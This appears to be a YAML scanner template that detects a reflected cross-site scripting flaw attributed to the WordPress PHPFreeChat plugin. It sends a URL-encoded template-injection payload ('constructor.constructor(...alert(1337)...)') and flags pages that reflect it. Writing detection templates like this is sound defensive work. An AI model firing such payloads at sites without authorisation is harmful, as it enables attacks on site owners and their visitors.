id: xss-priv-147
info:
  author: ibrahimhaxor
  name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
  reference: https://www.securityfocus.com/bid/54332/info
  severity: medium
  tags: wordpress,xss,wp-plugin
requests:
- matchers:
  - part: body
    type: word
    words:
    - '%7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D'
  - part: header
    type: word
    words:
    - text/html
  - status:
    - 200
    type: status
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}/%7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D'
